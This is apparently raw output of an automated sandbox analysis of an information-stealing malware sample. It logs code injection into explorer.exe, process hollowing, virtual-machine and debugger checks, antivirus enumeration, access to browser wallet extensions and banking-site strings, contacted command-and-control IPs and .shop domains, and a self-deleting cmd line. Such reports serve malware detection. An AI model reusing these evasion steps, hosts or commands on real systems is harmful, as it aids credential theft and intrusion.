Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02158B40 push eax; ret 0_2_02158B41
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0215D996 push 0000002Ah; iretd 0_2_0215D9E0
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_021574B7 push ss; iretw 0_2_021574C9
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_021584CC push cs; retf 0_2_021584CD
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_021578EA push cs; retf 0038h 0_2_02157969
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00402CD7 push cs; retf 6_2_00402CD8
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401EA7 push 0000000Eh; retf 0038h 6_2_00401EB6
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_004033B6 push eax; ret 6_2_00403419
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C1F0E push 0000000Eh; retf 0038h 6_2_020C1F1D
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C2D3E push cs; retf 6_2_020C2D3F
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02203927 push edx; retf 6_2_02203BC6
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_0220DF36 push 0000002Ah; iretd 6_2_0220DF80
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02208A6C push cs; retf 6_2_02208A6D
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02207A57 push ss; iretw 6_2_02207A69
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02207E8A push cs; retf 0038h 6_2_02207F09
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_022090E0 push eax; ret 6_2_022090E1
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02207EFA push 0000000Eh; retf 0038h 6_2_02207F09
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0214030D push ecx; ret 7_2_02140315
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427B010 push edx; ret 11_2_0427B21F
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A910 push edx; ret 11_2_0427A91B
Source: C:\Users\user\AppData\Local\Temp\EE6.exe File created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5876.exe
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\etrtabd
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EE6.exe
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\xvjv1bpknz.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5876.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\etrtabd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\5876.exe System information queried: FirmwareTableInformation
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 481
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1153
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 774
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 351
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 377
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3695
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 875
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll
Source: C:\Windows\explorer.exe TID: 7556 Thread sleep count: 481 > 30
Source: C:\Windows\explorer.exe TID: 7564 Thread sleep count: 1153 > 30
Source: C:\Windows\explorer.exe TID: 7564 Thread sleep time: -115300s >= -30000s
Source: C:\Windows\explorer.exe TID: 7560 Thread sleep count: 774 > 30
Source: C:\Windows\explorer.exe TID: 7560 Thread sleep time: -77400s >= -30000s
Source: C:\Windows\explorer.exe TID: 7900 Thread sleep count: 351 > 30
Source: C:\Windows\explorer.exe TID: 7900 Thread sleep time: -35100s >= -30000s
Source: C:\Windows\explorer.exe TID: 7896 Thread sleep count: 299 > 30
Source: C:\Windows\explorer.exe TID: 7904 Thread sleep count: 377 > 30
Source: C:\Windows\explorer.exe TID: 7904 Thread sleep time: -37700s >= -30000s
Source: C:\Windows\explorer.exe TID: 7564 Thread sleep count: 3695 > 30
Source: C:\Windows\explorer.exe TID: 7564 Thread sleep time: -369500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5876.exe TID: 8020 Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4508 Thread sleep count: 54 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 12_2_6D0CEBF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: 5876.exe, 00000007.00000003.1761083758.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: IEBAAF.12.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: IEBAAF.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: IEBAAF.12.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: IEBAAF.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: global block list test formVMware20,11696494690
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?n
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: IEBAAF.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: IEBAAF.12.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: IEBAAF.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: IEBAAF.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: IEBAAF.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: IEBAAF.12.dr Binary or memory string: discord.comVMware20,11696494690f
Source: IEBAAF.12.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00=
Source: IEBAAF.12.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: IEBAAF.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: IEBAAF.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: IEBAAF.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: IEBAAF.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: IEBAAF.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: IEBAAF.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: IEBAAF.12.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareoItL
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\etrtabd System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\etrtabd Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile, 0_2_00403406
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_6D19AC62
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0211092B mov eax, dword ptr fs:[00000030h] 0_2_0211092B
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h] 0_2_02110D90
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_02155A27 push dword ptr fs:[00000030h] 0_2_02155A27
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C092B mov eax, dword ptr fs:[00000030h] 6_2_020C092B
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_020C0D90 mov eax, dword ptr fs:[00000030h] 6_2_020C0D90
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_02205FC7 push dword ptr fs:[00000030h] 6_2_02205FC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0079DAB3 push dword ptr fs:[00000030h] 7_2_0079DAB3
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0212092B mov eax, dword ptr fs:[00000030h] 7_2_0212092B
Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h] 7_2_02120D90
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0040BD58 LocalReAlloc,InterlockedExchange,RtlDeleteCriticalSection,InitAtomTable,WriteConsoleOutputA,ReadFileScatter,GetModuleFileNameW,RaiseException,RtlInterlockedPopEntrySList,FileTimeToSystemTime,SetCalendarInfoA,SetConsoleMode,GetFileAttributesW,CompareStringW,ActivateActCtx,LoadLibraryA,EnumTimeFormatsW,GetProcessHeaps, 0_2_0040BD58

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: EE6.exe.2.dr
Source: C:\Windows\explorer.exe Network Connect: 109.175.29.39 80
Source: C:\Windows\explorer.exe Network Connect: 190.13.174.94 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 190.147.128.172 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory allocated: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_0427A4F0
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Thread created: C:\Windows\explorer.exe EIP: 89B19E0
Source: C:\Users\user\AppData\Roaming\etrtabd Thread created: unknown EIP: 8BD19E0
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 value starts with: 4D5A
Source: 5876.exe String found in binary or memory: zippyfinickysofwps.shop
Source: 5876.exe String found in binary or memory: obsceneclassyjuwks.shop
Source: 5876.exe String found in binary or memory: acceptabledcooeprs.shop
Source: 5876.exe String found in binary or memory: whispedwoodmoodsksl.shop
Source: 5876.exe String found in binary or memory: boredimperissvieos.shop
Source: 5876.exe String found in binary or memory: holicisticscrarws.shop
Source: 5876.exe String found in binary or memory: sweetsquarediaslw.shop
Source: 5876.exe String found in binary or memory: plaintediousidowsko.shop
Source: 5876.exe String found in binary or memory: miniaturefinerninewjs.shop
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Section unmapped: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base address: 400000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 401000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 422000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 42E000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 641000
Source: C:\Users\user\AppData\Local\Temp\EE6.exe Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D1E4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 12_2_6D1E4760
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 12_2_6D0C1C30
Source: explorer.exe, 00000002.00000000.1401510441.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd]1Q
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19AE71 cpuid 12_2_6D19AE71
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: GetLocaleInfoA, 0_2_0040B534
Source: C:\Users\user\AppData\Roaming\etrtabd Code function: GetLocaleInfoA, 6_2_0040B534
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\5876.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D19A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_6D19A8DC
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0E8390 NSS_GetVersion, 12_2_6D0E8390
Source: C:\Users\user\AppData\Local\Temp\5876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058443269.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\5876.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
